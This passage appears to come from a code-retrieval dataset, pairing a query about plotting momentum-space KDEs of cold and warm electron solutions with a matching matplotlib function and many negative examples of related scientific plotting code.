print(f'Saved plot to: plots/thm2_D.pdf')" ]
[ "0.7816318", "0.70826715", "0.6468687", "0.61942935", "0.6098648", "0.60919285", "0.59449416", "0.58786696", "0.5867492", "0.58451384", "0.5830002", "0.58245164", "0.5811453", "0.5785101", "0.5761999", "0.57525295", "0.57412106", "0.5740107", "0.5730716", "0.5714857", "0.5704623", "0.5693303", "0.5685386", "0.56710327", "0.56552815", "0.56487155", "0.56362224", "0.56319755", "0.5629802", "0.5618879" ]
0.73915446
1
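Each record in this dump carries the same fields in the same order: a natural-language query, the positive code document it should retrieve, a metadata objective, a list of 30 hard-negative documents, their scores, and the positive's score and rank. For orientation, a minimal sketch of how one parsed record could be materialized into training triplets according to its ["query", "document", "negatives"] objective; the `record` dict shape and the `to_triplets` helper are illustrative assumptions, not part of the dataset:

def to_triplets(record):
    # Materialize (anchor, positive, negative) tuples by following the field
    # names listed in the record's own metadata["objective"]["triplet"] spec.
    triplets = []
    for anchor_key, pos_key, neg_key in record["metadata"]["objective"]["triplet"]:
        anchor = record[anchor_key]        # e.g. the natural-language query
        positive = record[pos_key]         # e.g. the matching code snippet
        for negative in record[neg_key]:   # each of the 30 hard negatives
            triplets.append((anchor, positive, negative))
    return triplets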
Make a paper plot for the momentum KDE of the low-field and full-drift solutions.
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter

# Assumed module-level names, following the rest of this plotting module:
# pp (problem parameters: outputLoc, figureLoc), utilities, electron_df,
# and the plot constants med_color, high_color, different_small_size.


def momentum_kde2_paperplot(fields):
    """Paper figure: momentum-space KDEs of the deviational occupation for the
    cold-electron (solution 2, low-field) and warm-electron (solution 3,
    full-drift) solutions at each applied field in fields (V/m)."""
    plt.figure(figsize=(2.65, 2.5))
    ax = plt.axes([0.18, 0.17, 0.8, 0.8])
    colorList = [med_color, high_color]
    lw = 1.5
    meankx_2 = []
    meankx_3 = []
    # kx axis of the precomputed KDE output for the first field
    k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + "E_{:.1e}.npy".format(fields[0]))
    # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color, label='Equilibrium')
    ax.axhline(0, color='black', linestyle='--', linewidth=0.5)  # zero-deviation (equilibrium) reference
    # ax.axvline(0, color='gray', linewidth=0.8, alpha=0.5)
    for i, ee in enumerate(fields):
        ee_Vcm = ee / 100  # field in V/cm, used for the legend labels
        # Load the precomputed KDEs of the equilibrium (f0) and deviational distributions.
        k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + "E_{:.1e}.npy".format(ee))
        kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + "E_{:.1e}.npy".format(ee))
        kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + "E_{:.1e}.npy".format(ee))
        kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + "E_{:.1e}.npy".format(ee))
        kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + "E_{:.1e}.npy".format(ee))

        # Mean kx of each steady-state solution (kept for the optional annotations below).
        chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + "E_{:.1e}.npy".format(ee))
        meankx_2.append(utilities.mean_kx(chi_2_i, electron_df))
        chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + "E_{:.1e}.npy".format(ee))
        meankx_3.append(utilities.mean_kx(chi_3_i, electron_df))

        ax.plot(k_ax, kdist_2, '--', linewidth=lw, color=colorList[i],
                label='Cold ' + r'{:.0f} '.format(ee_Vcm) + r'$\rm V cm^{-1}$')
        ax.plot(k_ax, kdist_3, '-', linewidth=lw, color=colorList[i],
                label='Warm ' + r'{:.0f} '.format(ee_Vcm) + r'$\rm V cm^{-1}$')
    # ax.plot(k_ax, kdist_f0_3, '--', linewidth=lw, color='black', label=r'$f_0$')
    # ax.plot(meankx_2, np.mean(abs(kdist_2))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black')
    # ax.plot(meankx_3, np.mean(abs(kdist_3))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black')

    ax.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
    ax.locator_params(axis='y', nbins=6)
    ax.locator_params(axis='x', nbins=6)
    # ax.tick_params(direction='in')
    ax.set_xlim(-0.085, 0.081)

    plt.xlabel(r'$\rm k_x \, \, (\AA^{-1})$')
    plt.ylabel(r'Deviational occupation $\rm \Delta f_{\mathbf{k}}$')
    # plt.grid(lw=0.8, linestyle='dotted')
    # plt.ylabel(r'$\delta f_{\mathbf{k}}/f_{\mathbf{k}}^0$')
    # plt.ylim([-1,1])
    plt.legend(frameon=False, prop={'size': different_small_size})
    plt.savefig(pp.figureLoc + 'momentum_KDE2.png', dpi=600)
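For context, a hedged sketch of how the document above might be invoked. The field values are hypothetical, and the conversion convention (fields given in V/m, divided by 100 for V/cm labels) is inferred from the code itself; the .npy inputs under pp.outputLoc must already exist from the steady-state solves:

# Illustrative driver, not part of the dataset record: reads the precomputed
# KDE and steady-state files and writes momentum_KDE2.png to pp.figureLoc.
if __name__ == '__main__':
    example_fields = [1e4, 4e4]  # assumed applied fields in V/m (100 and 400 V/cm)
    momentum_kde2_paperplot(example_fields)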
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def momentum_kde_paperplot(fields):\n fig, (ax1, ax2, ax3) = plt.subplots(nrows=3, sharex=True)\n axisList = [ax1,ax2,ax3]\n i =0\n\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n for ee in fields:\n ee_Vcm = ee/100\n textstr = r'$E_{k_x}\\, = \\, %.1f \\, V \\, cm^{-1}$' % ee_Vcm\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + \"E_{:.1e}.npy\".format(ee))\n\n kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + \"E_{:.1e}.npy\".format(ee))\n axisList[i].fill(k_ax, kdist_2/np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Cold '+r'$e^{-}$ '+r'$\\Delta f$',color='blue')\n axisList[i].fill(k_ax, kdist_3/np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Warm '+r'$e^{-}$ '+r'$\\Delta f$',color='red')\n axisList[i].plot(k_ax, kdist_2/np.max(kdist_f0_2), '-', linewidth=1,color='blue')\n axisList[i].plot(k_ax, kdist_3/np.max(kdist_f0_2), '-', linewidth=1,color='red')\n axisList[i].plot(k_ax, kdist_f0_2/np.max(kdist_f0_2), '-', linewidth=1, label='Equilibrium Dist.',color='black')\n axisList[i].yaxis.set_major_formatter(FormatStrFormatter('%g'))\n axisList[i].locator_params(axis='y', nbins=3)\n axisList[i].locator_params(axis='x', nbins=5)\n axisList[i].set_xlim(-0.06,0.06)\n axisList[i].text(0.02, 0.92, textstr, transform=axisList[i].transAxes, verticalalignment='top', bbox=props)\n\n i = i+1\n plt.xlabel(r'$k_x \\, \\, (\\AA^{-1})$')\n ax2.set_ylabel('Occupation Probability (norm.)')\n axisList[0].legend(loc=\"upper right\")\n plt.savefig(pp.figureLoc+'momentum_KDE.png', bbox_inches='tight',dpi=600)", "def energy_kde_paperplot(fields,df):\n plt.figure()\n i = 0\n colorList = ['dodgerblue','tomato']\n lw = 2\n\n meanE_2 = []\n meanE_3 = []\n mup = np.min(df['energy [eV]']) - pp.mu\n chi_0 = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(fields[0]))\n g_en_axis, _, _, _, _, _, _, _, _, _, _, _, _, _ = \\\n occupation_plotter.occupation_v_energy_sep(chi_0, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), np.zeros(len(g_en_axis)), '-', color='black', lineWidth=lw,label='Equilibrium')\n\n for ee in fields:\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n # meanE_2 = utilities.mean_energy(chi_2_i,df)\n g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \\\n occupation_plotter.occupation_v_energy_sep(chi_2_i, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,'--',color = colorList[i],lineWidth=lw,label=r'Low Field {:.0f} '.format(ee/100)+r'$V \\, cm^{-1}$')\n print(integrate.trapz(g_chiax,g_en_axis))\n\n # plt.plot(meanE_2-np.min(df['energy [eV]']),0,'.')\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \\\n occupation_plotter.occupation_v_energy_sep(chi_3_i, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,color = colorList[i],lineWidth=lw,label=r'Full Drift {:.0f} '.format(ee/100)+r'$V \\, cm^{-1}$')\n print(integrate.trapz(g_chiax,g_en_axis))\n\n i = i + 1\n # plt.plot(g_en_axis - np.min(df['energy [eV]']), g_f0ax, '--', 
color='black', lineWidth=lw,label=r'$f_0$')\n\n plt.legend()\n # plt.ylim([-0.02, 0.015])\n plt.xlabel(r'Energy above CBM ($eV$)')\n plt.ylabel(r'Deviational occupation $\\delta f_{\\mathbf{k}}$ (norm.)')\n # plt.ylabel(r'$\\delta f_{\\mathbf{k}}/f_{\\mathbf{k}}^0$')\n plt.savefig(pp.figureLoc+'energy_KDE.png', bbox_inches='tight',dpi=600)\n\n plt.figure()\n plt.plot(g_en_axis,g_chiax)\n\n plt.figure()\n Z, xedges, yedges = np.histogram2d(df['kx [1/A]']*chi_3_i,df['ky [1/A]']*chi_3_i)\n plt.pcolormesh(xedges, yedges, Z.T)\n\n from scipy.stats.kde import gaussian_kde\n g_inds,_,_ = utilities.gaas_split_valleys(df,False)\n g_df = df.loc[g_inds]\n\n x = g_df['kx [1/A]']*(chi_3_i[g_inds]+g_df['k_FD'])\n y = g_df['ky [1/A]']*(chi_3_i[g_inds]+g_df['k_FD'])\n\n # y = g_df['energy [eV]']*(chi_3_i[g_inds]+g_df['k_FD'])\n k = gaussian_kde(np.vstack([x, y]))\n xi, yi = np.mgrid[x.min():x.max():x.size ** 0.5 * 1j, y.min():y.max():y.size ** 0.5 * 1j]\n zi = k(np.vstack([xi.flatten(), yi.flatten()]))\n\n fig = plt.figure(figsize=(7, 8))\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(212)\n\n # alpha=0.5 will make the plots semitransparent\n ax1.pcolormesh(xi, yi, zi.reshape(xi.shape), alpha=0.5)\n ax2.contourf(xi, yi, zi.reshape(xi.shape), alpha=0.5)\n\n ax1.set_xlim(x.min(), x.max())\n ax1.set_ylim(y.min(), y.max())\n ax2.set_xlim(x.min(), x.max())\n ax2.set_ylim(y.min(), y.max())", "def plot_dereddening():\n extinction_coefficients = {'2365-2764-1': np.array([0.2622, 0.844]), '4109-638-1': np.array([0.0524, 0.1576]),\n '2058-56-1': np.array([0.0751, 0.248]), '3642-2459-1': np.array([0.1907, 0.608]),\n '3999-1391-1': np.array([0.3911, 1.2480]), '2607-1448-1': np.array([0.0430, 0.1310])}\n cepheids = {'2365-2764-1': np.array([0.959, 2.09]), '4109-638-1': np.array([0.705, 2.385]), '2058-56-1':\n np.array([1.222, 1.333]), '3642-2459-1': np.array([1.088, 2.0518]), '3999-1391-1':\n np.array([1.360, 1.2567]), '2607-1448-1': np.array([1.484, 0.6963])}\n periods = {'2365-2764-1': 1.61, '4109-638-1': 15.31, '2058-56-1': 63.08, '3642-2459-1': 1.86, '3999-1391-1': 24.98,\n '2607-1448-1': 8.54}\n max_periods = max(periods.values())\n\n new_positions_bv_mv = [] # in M_V vs B-V space\n colors = []\n theoretical_position = []\n for obj in extinction_coefficients.keys():\n # new_positions_bv_mv.append(cepheids[obj]-extinction_coefficients[obj])\n new_positions_bv_mv.append(cepheids[obj])\n colors.append(periods[obj]/max_periods)\n theoretical_position.append(-2.78*np.log10(periods[obj])-1.35)\n\n for pos in range(len(new_positions_bv_mv)):\n plt.scatter(new_positions_bv_mv[pos][0], new_positions_bv_mv[pos][1], marker='^', facecolor='w', s=40)\n plt.scatter(new_positions_bv_mv[pos][0], theoretical_position[pos], marker='o', facecolor='r', s=50)\n return new_positions_bv_mv, colors", "def plot_kde():\n f, (ax1, ax2) = plt.subplots(1, 2, sharey=True, sharex=True)\n sns.kdeplot(data.data.numpy()[:,0], data.data.numpy()[:,1], color=\"r\", shade=True, ax=ax1)\n sns.kdeplot(dec_mean.data.numpy()[:,0], dec_mean.data.numpy()[:,1], color=\"b\", shade=True, ax=ax2)\n plt.show()\n plt.pause(1e-6)\n plt.gcf().clear()", "def plot_field_uncertainties():\n\n resize_size = (1000, 1000)\n\n\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n if drug_name == 'DMSO':\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/30_hours/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n\n def 
transform(x):\n if type(x) is np.ndarray:\n x = change_array_lims(x)\n x = np.log(x)\n return x\n\n F_unc_vmin = -7\n F_unc_vmax = -4\n sigma_vmin = -5\n sigma_vmax = 0 #0.4\n sigma_unc_vmin = -6\n sigma_unc_vmax = -2\n\n fig_Fs = [plt.figure() for _ in range(3)]\n fig_uncertainty = plt.figure()\n sigma_lists, F_arrays = [], []\n for idx_fig, dir in enumerate(dirs):\n\n p_list = _load_and_resize_list(dir+'p_list_0.pickle')\n D_list = _load_and_resize_list(dir+'D_list_0.pickle')\n U_array = pickle.load(open(dir+'U.pickle', 'rb'))\n U_array = cv2.resize(U_array, resize_size, interpolation = cv2.INTER_LINEAR)\n Gx, Gy = np.gradient(U_array, 26./resize_size[0], 26./resize_size[0]) # gradients with respect to x and y\n F_array = (Gx**2+Gy**2)**.5 # gradient magnitude\n F_array[np.isinf(F_array)] = np.nan\n F_array[p_list[-1]<1e-3]=np.nan # final PDF\n sigma_list = []\n for j in range(9):\n arr = D_list[2*j] # current PDF\n arr[p_list[j]<1e-3]=np.nan\n sigma_list.append(np.sqrt(2*arr))\n\n\n sigma_lists.append(sigma_list)\n F_arrays.append(F_array)\n\n ax = fig_Fs[idx_fig].add_subplot(111)\n ax.imshow(transform(F_array)[::-1, :], cmap = cmap, vmin = -4.6, vmax = -2)\n ax.set_title(dir)\n\n all_axes = [i for j in fig_Fs for i in j.axes]\n for ax in all_axes:\n ax.axis('off')\n\n # uncertainties\n\n std = np.std(F_arrays, axis = 0)\n ax = fig_uncertainty.add_subplot(121)\n ax.imshow(transform(std)[::-1, :], cmap = cmap, vmin = F_unc_vmin, vmax = F_unc_vmax)\n ax.set_title('F_uncertainty')\n\n fig_sigma = plt.figure()\n ax = fig_sigma.add_subplot(111)\n ax.imshow(transform(np.nanmean(sigma_lists[0], axis = 0))[::-1, :], cmap = cmap, vmin = sigma_vmin, vmax = sigma_vmax) # index 0 (i.3 'original' is corresponds to the landscapes in other figures)\n ax.set_title('sigma_mean')\n\n sigma_means = [np.nanmean(sigma_list, axis = 0) for sigma_list in sigma_lists]\n std_array = np.nanstd(sigma_means, axis = 0)\n ax = fig_uncertainty.add_subplot(122)\n ax.imshow(transform(std_array)[::-1, :], cmap = cmap, vmin = sigma_unc_vmin, vmax = sigma_unc_vmax)\n ax.set_title('sigma_uncertainty')\n\n fig_sigma.savefig(path_to_here+'/../outputs/{}_mean_sigma.png'.format(drug_name), dpi = 1200)\n fig_uncertainty.savefig(path_to_here+'/../outputs/{}_uncertainties.png'.format(drug_name), dpi = 1200)", "def small_signal_mobility_paperplot(fieldVector, freqVector, df):\n vcm = np.array(fieldVector)*1e-2\n n = utilities.calculate_density(df)\n lw = 1.5\n fig, ax = plt.subplots()\n for freq in freqVector:\n cond = []\n mu_3 = []\n for ee in fieldVector:\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(vcm, np.array(np.real(cond))/c.e/n*100**2, '-', label='{:.1f} GHz'.format(freq),linewidth=lw)\n ax.plot(vcm,mu_3,'-',label = 'Ohmic Mobility',linewidth=lw)\n plt.xlabel(r'Field ($\\rm V \\, cm^{-1}$)')\n plt.ylabel(r'AC Mobility ($\\rm cm^2 \\, V^{-1} \\, s^{-1}$)')\n plt.ylim([-0.05*np.max(mu_3),np.max(mu_3)*1.2])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.legend(ncol=3,loc='lower center')\n plt.savefig(pp.figureLoc+'ac_mobility.png', bbox_inches='tight',dpi=600)\n\n\n plt.figure(figsize=(2.05, 2.5))\n ax = plt.axes([0.21, 0.19, 0.75, 0.75])\n i = 0\n for ee in fieldVector:\n colorList = [eq_color, med_color, high_color]\n 
cond = []\n cond_linear = []\n mu_3 = []\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(freqVector, np.array(np.real(cond))/c.e/n*100**2/1000, '-',\n label='{:.0f} '.format(ee/100)+r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n\n plt.xlabel(r'Frequency (GHz)')\n plt.ylabel(r'$\\Re(\\rm AC\\ mobility$) (1000 $\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n plt.ylim([0, 20])\n plt.xlim([freqs[0], freqs[-1]])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n plt.xlim([freqVector[0],freqVector[-1]])\n locmaj = matplotlib.ticker.LogLocator(base=10, numticks=6)\n ax.xaxis.set_major_locator(locmaj)\n locmin = matplotlib.ticker.LogLocator(base=10.0, subs=np.arange(2, 10) * .1,\n numticks=100)\n ax.xaxis.set_minor_locator(locmin)\n plt.savefig(pp.figureLoc+'Real_ac_mobility.png',dpi=600)\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.imag(cond)) / c.e / n * 100 ** 2, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n\n i = i + 1\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'$\\Im \\, [\\mu_{\\omega}]$ ($\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Imag_ac_mobility.png', bbox_inches='tight', dpi=600)\n\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + 
\"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.arctan(np.imag(cond)/np.real(cond)))/np.pi, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n ax.yaxis.set_major_formatter(tck.FormatStrFormatter('%g $\\pi$'))\n ax.yaxis.set_major_locator(tck.MultipleLocator(base=1.0))\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'AC Mobility Phase Angle (Radians)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend()\n yloc = plt.MaxNLocator(6)\n ax.yaxis.set_major_locator(yloc)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Phase_ac_mobility.png', bbox_inches='tight', dpi=600)", "def plot_perturbation(wind=7, mldp=30, pref=\"ca\"):\n pl.clf()\n fig,axes = pl.subplots(3, 1, sharex=True, num=1,figsize=(6,6))\n model_kws = dict(pref=pref, reg=\"pert\",\n temp=None, salt=None, wind=wind, mldp=mldp,\n deepmld1={\"pert\":0, \"tpos\":165},\n deepmld2={\"pert\":0, \"tpos\":553},\n uppwell1={\"pert\":0, \"tpos\":165, \"pdays\":5},\n uppwell2={\"pert\":0, \"tpos\":553, \"pdays\":5})\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=0.5) \n if pref == \"ca\":\n preftxt = \"CCS\"\n model_kws[\"uppwell1\"][\"pert\"] = 82.5\n model_kws[\"uppwell2\"][\"pert\"] = 165\n else:\n preftxt = \"NWA\"\n model_kws[\"deepmld1\"][\"pert\"] = 17\n model_kws[\"deepmld2\"][\"pert\"] = 34\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=1)\n pl.suptitle(\n f\"Perturbations, temp and salt for {preftxt}, wind:{wind}m/s, mld:{mldp}m\")\n pl.savefig(os.path.join(FIGDIR, f\"pertubation_timeseries_{pref}.pdf\"))", "def fig_2():\n epoch = 3\n N = 60000\n Nr = N\n K = 32\n n_iter = 256\n Nstar = 16\n data = 'dr10'\n factor = 100.\n features = ['psf_mag', 'model_colors', 'psf_minus_model']\n filters = ['r', 'ug gr ri iz', 'ugriz']\n message = 'pm_mc_pmm_r_all_all'\n model = 'xdmodel_%s_%d_%d_%d_%d_%s.pkl' % (data, Nr, K, n_iter, Nstar,\n message)\n model = os.environ['xddata'] + model\n figname = os.environ['xdplots'] + 'fig2.png'\n posteriors_plot(model, features, filters, figname, idx=-3)", "def linear_mobility_paperplot(fieldVector,df):\n vcm = np.array(fieldVector) * 1e-2\n lw = 1.5\n mu_1 = []\n mu_2 = []\n mu_3 = []\n meanE_1 = []\n meanE_2 = []\n meanE_3 = []\n for ee in fieldVector:\n chi_1_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '1_' + \"E_{:.1e}.npy\".format(ee))\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_1.append(utilities.calc_linear_mobility(chi_1_i, df, ee) * 10 ** 4)\n mu_2.append(utilities.calc_linear_mobility(chi_2_i, df, ee) * 10 ** 4)\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n meanE_1.append(utilities.mean_energy(chi_1_i,df))\n meanE_2.append(utilities.mean_energy(chi_2_i,df))\n meanE_3.append(utilities.mean_energy(chi_3_i,df))\n\n plt.figure(figsize=(2.05,2.5))\n # ax = plt.axes([0.2, 0.19, 0.75, 0.76])\n ax = plt.axes([0.21, 0.19, 0.75, 0.75])\n mufac = 1000\n # mufac = 1000\n ax.plot(vcm, np.array(mu_3)/mufac, '-', linewidth=lw, label='Warm', color=warm_color)\n ax.plot(vcm, np.array(mu_2)/mufac, '--', linewidth=lw, 
label='Cold', color=cold_color)\n ax.plot(vcm, np.array(mu_1)/mufac, '--', linewidth=lw, label='RTA', color=rta_color)\n\n plt.xlim([0,np.max(fieldVector)/100])\n plt.xlabel(r'Electric field ($\\rm V \\, cm^{-1}$)')\n # plt.ylabel(r'$\\sigma^{\\omega = 0}_{\\parallel}$ ($\\rm cm^2 \\, kV^{-1}\\, s^{-1}$)')\n plt.ylabel(r'DC mobility (1000 $\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n plt.ylim([0.8e4/mufac, 2e4/mufac])\n ax.locator_params(axis='x', nbins=6)\n # plt.legend(ncol=3,loc='lower center',frameon=False)\n plt.legend(frameon=False)\n plt.savefig(pp.figureLoc +'linear_mobility2.png',dpi=600)\n\n plt.figure()\n lw = 2\n plt.plot(vcm,(np.array(meanE_1) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='RTA')\n plt.plot(vcm,(np.array(meanE_2) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='Cold '+r'$e^{-}$')\n plt.plot(vcm,(np.array(meanE_3) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='Warm '+r'$e^{-}$')\n plt.xlabel(r'Electric field [$kV/cm$]')\n plt.ylabel(r'Mean Energy [meV]')\n plt.title(pp.title_str)\n plt.savefig(pp.figureLoc +'meanEnergy_vField.png', bbox_inches='tight',dpi=600)\n plt.legend(frameon=False)", "def fig_4():\n epoch = 3\n N = 60000\n Nr = N\n K = 32\n n_iter = 256\n Nstar = 16\n data = 'dr10'\n factor = 100.\n features = ['psf_mag', 'model_colors', 'psf_minus_model']\n filters = ['r', 'ug gr ri iz', 'ugriz']\n message = 'pm_mc_pmm_r_all_all'\n model = 'xdmodel_%s_%d_%d_%d_%d_%s.pkl' % (data, Nr, K, n_iter, Nstar,\n message)\n model = os.environ['xddata'] + model\n figname = os.environ['xdplots'] + 'fig4.png'\n xx_plot(epoch, model, features, filters, figname)", "def plot_dmstep(self):\n\n x, y = self._calculate_snr_spread()\n\n # Attach a curve\n curve = Qwt.QwtPlotCurve()\n curve.attach(self)\n curve.setPen(Qt.QPen(Qt.Qt.blue, 2))\n curve.setData(x, y)\n \n self.replot()", "def grayplot_NH(QC,stage):\n\n\n #set some constants\n numpts=QC['GMtcs'].shape[1] #number of timepoints\n rightsignallim = np.arange(-20,21,20) #GS, main plot signal limits - 2% assuming mode 1000 normalization\n leftsignallim = np.arange(0,21,10) #DVars limits\n rylimz=[np.min(rightsignallim),np.max(rightsignallim)]\n lylimz=[np.min(leftsignallim),np.max(leftsignallim)]\n FDmult = 10 #multiplier to FD to get in range of DVars values\n FDthresh = 0.2 #FD threshold to mark frame for scrubbing (use 0.1 for filtered FD)\n\n #compute data quality metrics -- CG: compute by hand to better understand (separated here for practice)\n [mvm,ddt_mvm,FD] = compute_FD(QC['MVM'])\n DVars = compute_DVARS(QC['GMtcs'][:,:,stage]) # compute DVARs for a particular processing stage\n GS = compute_GS(QC['GMtcs'][:,:,stage]) # compute global signal for a particular processing stage\n\n #create plot\n fig = plt.figure(figsize=(10,10),constrained_layout = True)\n gs = GridSpec(9,1,figure=fig)\n\n #plot individual mvm params\n ax1 = fig.add_subplot(gs[0:2])\n pointindex = 